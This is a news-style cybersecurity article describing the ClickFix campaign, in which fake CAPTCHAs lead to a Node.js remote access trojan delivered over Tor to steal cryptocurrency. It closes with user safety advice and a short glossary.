Behind the CAPTCHA: How ClickFix Scammers Are Using Node.js and Tor to Drain Crypto Wallets

It happens in a split second: you click a CAPTCHA box to prove you’re human, and in that instant, your computer becomes a target. What you don’t see is the digital ambush unfolding behind the scenes - a sophisticated cybercrime operation that’s quietly stealing cryptocurrency from victims around the globe. Welcome to the world of ClickFix, a new breed of malware campaign that’s as professional as it is insidious.

Fast Facts

• ClickFix attacks start with a fake CAPTCHA that triggers malware installation on Windows PCs.
• The malware is a Remote Access Trojan (RAT) built with Node.js and delivered via the Tor network.
• Malware modules are loaded dynamically into memory, making detection extremely difficult.
• The campaign operates as a Malware-as-a-Service (MaaS), rented out to cybercriminal affiliates.
• Researchers uncovered the backend after hackers exposed their admin panel due to an OPSEC mistake.

The Anatomy of a ClickFix Attack

This new scam starts with a simple deception: a counterfeit CAPTCHA prompt. Instead of verifying your humanity, a hidden PowerShell command silently downloads a malicious installer - NodeServer-Setup-Full.msi - from a remote server. The payload? A Remote Access Trojan with its own Node.js engine, designed to run seamlessly on any Windows machine.

Once inside, the malware immediately cloaks itself using the Tor network, hiding its communications from prying eyes. It burrows into a folder named “LogicOptimizer,” modifies the Windows Registry for persistence, and then goes dark - waiting for the right moment to strike.

What makes ClickFix particularly dangerous is its modular design. The most potent components are never written to disk; instead, they’re fetched on demand from the attackers’ server and run in memory only. This “fileless” approach allows the malware to evade most antivirus tools, leaving even vigilant users exposed.

Before launching its attack, ClickFix carefully scans the host system - checking Windows versions, CPU type, available memory, and even hunting for over 30 security products. If the system looks too well-defended, the malware stays dormant, minimizing the risk of discovery.

A Crime Factory in the Shadows

This is no amateur operation. ClickFix is run as Malware-as-a-Service, where criminal clients rent the toolkit to launch their own campaigns. The infrastructure uses gRPC protocols for real-time control and monitoring, with Tor-based channels feeding stolen wallet data and success notifications directly to scammers’ Telegram groups.

Researchers at Netskope Threat Labs were able to map the backend thanks to a rare operational blunder: the attackers left their admin panel exposed. Files like support.proto and admin.proto revealed how the system works, exposing the professionalism - and scale - of the operation.

Conclusion: Stay Paranoid, Stay Safe

ClickFix is a chilling reminder that even the most routine online interactions can hide advanced threats. As criminals become more sophisticated, users must become more cautious. If that CAPTCHA box looks even a bit suspicious, don’t click - your crypto wallet may depend on it.

WIKICROOK

• Remote Access Trojan (RAT): A Remote Access Trojan (RAT) is malware that lets attackers secretly control a victim’s computer from anywhere, enabling theft and spying.
• Node.js: Node.js is a platform for running JavaScript outside browsers, often on servers. It can be exploited to execute malware or automate attacks.
• Tor Network: The TOR Network is a privacy tool that routes internet traffic through several servers, making it hard to trace users’ identities or online actions.
• Malware: Il malware è un software dannoso progettato per infiltrarsi, danneggiare o rubare dati da dispositivi informatici senza il consenso dell’utente.
• gRPC: gRPC is a high-performance protocol for secure, efficient communication between services, often used in microservices and cloud-native architectures.